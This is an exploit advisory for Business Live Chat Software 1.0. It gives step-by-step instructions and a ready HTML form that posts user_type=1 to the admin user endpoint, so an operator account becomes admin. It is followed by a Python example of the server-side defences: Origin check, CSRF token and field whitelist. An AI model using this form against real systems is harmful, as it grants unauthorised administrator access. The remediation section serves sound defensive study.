# Exploit Title: Business Live Chat Software 1.0 - Cross-Site Request Forgery (Add Admin)
# Description: Operator Can Change Role User Type to admin
# Date: 2020-02-26
# Exploit Author: Meisam Monsef
# Vendor Homepage: https://www.bdtask.com/business-live-chat-software.php
# Version: V-1.0
# Tested on: ubuntu
Exploit:
1- Log in, or create an account.
2- Open exploit.html in the browser.
3- Change the user_id input to your own user id, so the request changes your role (user_type) to admin.
4- Fill in the input data (fname - lname - email).
5- Click the Update button.
6- Log out of the account.
7- Log in again: you are now admin. Enjoy.
<form action="https://TARGET/admin/user/users/create"
      enctype="multipart/form-data" method="post" accept-charset="utf-8">
user_id :<input type="text" name="user_id" value="1"><!-- change your user_id --><br>
fname :<input type="text" name="fname" value=""/><!-- fill your first name --><br>
lname :<input type="text" name="lname" value=""/><!-- fill your last name --><br>
email :<input type="text" name="email" value=""/><!-- fill your email --><br>
user_type :<input type="text" name="user_type" value="1"/><!-- user_type 1 = admin --><br>
status :<input type="text" name="status" value="1"/><br>
<button type="submit">Update</button>
</form>
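The form above succeeds because the server trusts every field the browser sends and performs no cross-site check. The following is an added server-side example written for this page, not code from the vendor's product: it models the three controls that each independently stop the request (Origin check, per-session CSRF token, and a field whitelist so that only an admin may set user_type or status). Field names are taken from the form above; the role encoding (user_type "1" = admin), the session layout, the allowed origin "https://TARGET" and the function names are assumptions made for the example.

```python
import hmac
import secrets

# Assumption for this example: the advisory's form sets user_type=1 to become
# admin, so "1" is treated as the admin role value here.
ADMIN_ROLE = "1"
PROFILE_FIELDS = {"fname", "lname", "email"}      # any user may edit these on own row
PRIVILEGED_FIELDS = {"user_type", "status"}       # admin only


def new_session(user_id, user_type):
    """Assumed session layout: the identity the server knows plus a CSRF token
    minted at login and embedded in the site's own forms (never in exploit.html)."""
    return {"user_id": user_id, "user_type": user_type,
            "csrf_token": secrets.token_hex(32)}


def authorize_user_update(session, form, origin=None, allowed_origin="https://TARGET"):
    """Decide whether a POST to the user-update endpoint may proceed.

    Returns (allowed, reason, fields_to_apply).  fields_to_apply is the subset of
    the submitted form the caller is actually permitted to write, so a forged
    user_type from an operator is dropped even when the rest of the request is valid.
    """
    # 1. Origin header check: a form hosted on an attacker's page carries a
    #    foreign Origin (or none); reject anything that is not our own site.
    if origin is not None and origin != allowed_origin:
        return False, "cross-origin request rejected", {}

    # 2. Synchronizer token: the submitted token must match the session's token.
    #    Constant-time compare avoids leaking the token through timing.
    submitted = form.get("csrf_token", "")
    if not hmac.compare_digest(submitted.encode(), session["csrf_token"].encode()):
        return False, "missing or invalid CSRF token", {}

    # 3. Authorization: operators may only touch their own profile fields;
    #    role and status changes require an admin session.
    is_admin = session["user_type"] == ADMIN_ROLE
    if not is_admin and form.get("user_id") != session["user_id"]:
        return False, "operators may only edit their own profile", {}
    permitted = PROFILE_FIELDS | (PRIVILEGED_FIELDS if is_admin else set())
    fields = {k: v for k, v in form.items() if k in permitted}
    return True, "ok", fields


if __name__ == "__main__":
    # Constructed sample: an operator session and the advisory's form body.
    operator = new_session("7", "2")
    forged = {"user_id": "7", "fname": "a", "lname": "b", "email": "a@b.test",
              "user_type": "1", "status": "1"}
    print(authorize_user_update(operator, forged, origin="https://evil.example"))
    print(authorize_user_update(operator, forged, origin="https://TARGET"))
    legit = dict(forged, csrf_token=operator["csrf_token"])
    print(authorize_user_update(operator, legit, origin="https://TARGET"))
```

The whitelist in step 3 is the fix that matters most for this advisory: even with CSRF protection in place, an operator who submits the form from the legitimate site would still become admin if the server copied user_type straight from the request into the users table.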